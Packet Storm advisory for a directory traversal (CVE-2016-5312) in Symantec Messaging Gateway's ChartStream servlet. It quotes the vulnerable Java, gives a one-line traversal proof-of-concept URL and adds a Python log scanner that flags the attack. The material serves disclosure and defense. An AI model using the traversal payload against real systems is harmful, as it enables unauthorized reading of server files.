Symantec Messaging Gateway 10.6.1 Directory Traversal

2016-09-28T00:00:00
ID PACKETSTORM:138891
Type packetstorm
Reporter R-73eN
Modified 2016-09-28T00:00:00

Description

                                        
`# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal  
# Date : 28/09/2016  
# Author : R-73eN  
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)  
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway  
# Vendor : Symantec  
# CVE : CVE-2016-5312  
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00  
#   
# DESCRIPTION:  
#  
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.   
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.   
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.  
#  
The problem lies in the package kavachart-kcServlet-5.3.2.jar, file com/ve/kavachart/servlet/ChartStream.java.  
The vulnerable code is:  
public class ChartStream extends HttpServlet {  
    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {  
        block6 : {  
            try {  
                // The request parameter "sn" is read into the variable "string".  
                String string = httpServletRequest.getParameter("sn");  
  
                if (string == null) break block6;  
                // The last three characters of "sn" become the image subtype of the response.  
                String string2 = string.substring(string.length() - 3);  
  
                // "string" is passed here without any sanitization for directory traversal,  
                // and you can successfully use this to do a directory traversal.  
                byte[] arrby = (byte[])this.getServletContext().getAttribute(string);  
  
                if (arrby != null) {  
                    httpServletResponse.setContentType("image/" + string2);  
                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();  
                    httpServletResponse.setContentLength(arrby.length);  
                    servletOutputStream.write(arrby);  
                    this.getServletContext().removeAttribute(string);  
                    break block6;  
                }  
                // ... remainder of doGet is not shown  
  
  
POC:   
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib  
  
`
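For defenders reviewing control center access logs, the following is an added example, not part of the original advisory or of Symantec's code. It flags ChartStream requests whose `sn` value, after repeated percent-decoding, falls outside an allow-list. The log format, the sample lines and the allow-list pattern for legitimate chart handles are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Servlet path as it appears in the advisory's POC URL.
SERVLET = "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"
# Assumption: a legitimate chart handle is one token plus a 3-letter image extension.
SAFE_SN = re.compile(r"[A-Za-z0-9_-]{1,128}\.[A-Za-z]{3}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, made-up users and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - admin [28/Sep/2016:10:00:01 +0000] "GET ' + SERVLET + '?sn=chart_1f3a9.png HTTP/1.1" 200 5120',
    '192.0.2.44 - user1 [28/Sep/2016:10:02:17 +0000] "GET ' + SERVLET + '?sn=../../WEB-INF/lib HTTP/1.1" 200 0',
    '192.0.2.44 - user1 [28/Sep/2016:10:02:19 +0000] "GET ' + SERVLET + '?sn=%252e%252e%252f%252e%252e%252fWEB-INF%252flib HTTP/1.1" 200 0',
    '192.0.2.10 - admin [28/Sep/2016:10:03:40 +0000] "GET /brightmail/ HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_sn(log_line):
    """Return the decoded 'sn' value when a ChartStream request carries a
    value outside the allow-list, otherwise None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if fully_decode(url.path) != SERVLET:
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("sn", []):
        sn = fully_decode(raw).replace("\\", "/")
        if not SAFE_SN.fullmatch(sn):
            return sn
    return None

def scan(lines):
    """Return (line index, decoded sn) for every flagged request."""
    hits = [(number, suspicious_sn(line)) for number, line in enumerate(lines)]
    return [(number, sn) for number, sn in hits if sn is not None]

if __name__ == "__main__":
    for number, sn in scan(SAMPLE_LOG):
        print(f"line {number}: unexpected sn value {sn!r}")
```

The allow-list approach flags anything unexpected rather than matching known traversal strings, so encoded and double-encoded variants are caught without a signature for each.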